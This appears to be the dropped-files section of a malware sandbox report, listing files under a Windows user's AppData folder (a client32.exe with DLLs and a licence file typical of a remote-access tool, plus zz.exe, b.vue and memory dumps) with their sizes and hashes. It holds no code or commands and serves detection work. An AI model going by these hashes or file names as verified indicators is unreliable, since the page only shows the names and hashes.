C:\Users\Admin\AppData\Roaming\Ns\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\NSM.LIC

Filesize
193B

MD5
dbce6f3a727c5eefb47f56b0b49c2bf4

SHA1
4bd5df07386d836fd577e044ff1a5ca21054b495

SHA256
b5821e458a0627d340816128fe5ecc7ef43ec36eaaf8b7d65ac9f9a769b08537

SHA512
8d93ba2d2f3493c309adb13b894824af854e973fcd13053da440fb4a10b5e03c0b07fb0b4852aec65473951fdcc0ad9d6c78ffa30f4f9ab4152a3b16249c64c6

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\PCICAPI.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\PCICL32.dll

Filesize
3.3MB

MD5
91c51ac9c50c26ad3e4249cc7cba5d59

SHA1
d33560d2f53bd8ec1b6535a865c8b30d926f859b

SHA256
abd28aecb2d57660bcd9455333b84d289aa883eaf5cf15def1bf0feb35833aa2

SHA512
3a88d40dac5e8f8478e257cc015d841d6faf7e3eab77e6dae4358dfb00c0b1bbd4bfd68338e9d5806f189be6b9d3b235b8fd6fa31cf9f93b6ac5dadf73c5fb45

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\client32.exe

Filesize
117KB

MD5
9dabf38bd7d2b88ef196ad531202d045

SHA1
8f0b8261a1eff925a39ca117099bc8b0317c941b

SHA256
f9a241a768397efb4b43924fbd32186fcb1c88716fff3085d3ddcdd322d3404f

SHA512
b8bb30396b77ffb6d23155b0259f084157bd0326b3960a4212cd67714a8e57c465226bbbdcd5a864ce9350d88c9d3e7328648a22d7613d4c7c8520cafbb50291

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\client32.ini

Filesize
784B

MD5
f3d2a26471c424e2f0b30422a07e3186

SHA1
9a2776fa80faf94050a1f9a7cafe0956294155ca

SHA256
388628a37645b4ed5a9a03f97d8c01f4f3409d2140e2d586e81863387032a67f

SHA512
d71dad5f5d365862d6c8d48ac2c935e2aa353e9c3d8ab5d4910e722087af8527630c721075fbbeb565688d9b70303a816b70a5a69d95e6f3c0716da3cd3a1a00

Download Submit
C:\Users\Admin\AppData\Roaming\Ns\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\b.vue

Filesize
1.5MB

MD5
dbdb7a30eda751836969867510f09e34

SHA1
b17f74b70e1276296c7cb03d954b9a9446bc76c8

SHA256
5b41e1bdbda615cc40eca6afe72a6d312ddb647be2e526108b68e4e27afe7476

SHA512
4aac924c08c7193d83a9562427ecda1b0b3af85710895424ffe3bf6436c8013b7348f97b990d8b7dd6351c97505e36a852917e9e8003a1bf51be7e9e9925a181

Download Submit
C:\Users\Admin\AppData\Roaming\zz.exe

Filesize
296KB

MD5
58712aacf6b0f8149c066bda3a034fc3

SHA1
cf2da87d52a6b08a3b9502b1f6082b8b76ba4d32

SHA256
43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87

SHA512
f9df1dfdc3f706a5adfe2f38e91d8a3cb23dd46cd35b26c95bfe6ede7a731a536c4fa72304b86e699db56c669819fa4e132ab37da9561240ee29743edf5bcc7f

Download Submit
memory/5476-364-0x0000014A7E120000-0x0000014A7E2E2000-memory.dmp

Filesize
1.8MB

Download
memory/5476-229-0x0000014A7D900000-0x0000014A7D922000-memory.dmp

Filesize
136KB

Download